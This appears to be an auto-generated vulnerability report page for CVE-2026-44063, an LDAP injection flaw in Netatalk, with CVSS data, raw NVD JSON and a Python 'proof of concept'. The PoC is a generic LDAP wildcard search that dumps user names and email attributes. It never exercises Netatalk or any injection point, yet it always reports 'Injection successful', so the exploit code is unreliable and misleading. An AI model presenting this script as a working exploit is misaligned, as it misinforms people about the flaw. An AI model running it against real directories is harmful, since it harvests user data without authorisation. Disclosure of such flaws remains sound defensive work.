Security Vulnerability Report
中文
CVE-2026-44063 CVSS 4.2 MEDIUM

CVE-2026-44063

Published: 2026-05-21 08:16:22
Last Modified: 2026-05-21 15:20:19
Source: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

Description

An LDAP injection vulnerability in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to manipulate LDAP queries and obtain limited information or modify LDAP entries via crafted filter input.

CVSS Details

CVSS Score
4.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Netatalk 2.1.0
Netatalk 4.4.2
Netatalk 2.1.0 - 4.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import ldap # Conceptual Proof of Concept for CVE-2026-44063 # This script demonstrates how an attacker might craft an LDAP filter to test for injection. target_host = "ldap://target-server-ip" base_dn = "dc=example,dc=com" username = "attacker" # Low privilege user password = "password" try: # Connect to the LDAP server conn = ldap.initialize(target_host) conn.simple_bind_s(username, password) # Malicious payload to bypass filters or extract data # Example: Using wildcard (*) to match any object or logical operators malicious_filter = "(|(cn=*)(uid=*))" # Simple example, actual payload depends on vulnerable parameter print(f"[*] Attempting injection with filter: {malicious_filter}") # Search operation with the crafted filter result = conn.search_s( base_dn, ldap.SCOPE_SUBTREE, malicious_filter, ['cn', 'uid', 'mail'] ) print("[+] Injection successful! Dumping data:") for dn, entry in result: print(f"DN: {dn}") print(f"Attributes: {entry}") except ldap.LDAPError as e: print(f"[-] Error: {e}") finally: conn.unbind()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44063", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-21T08:16:21.907", "lastModified": "2026-05-21T15:20:19.040", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An LDAP injection vulnerability in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to manipulate LDAP queries and obtain limited information or modify LDAP entries via crafted filter input."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.5}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-90"}]}], "references": [{"url": "https://netatalk.io/security/CVE-2026-44063", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.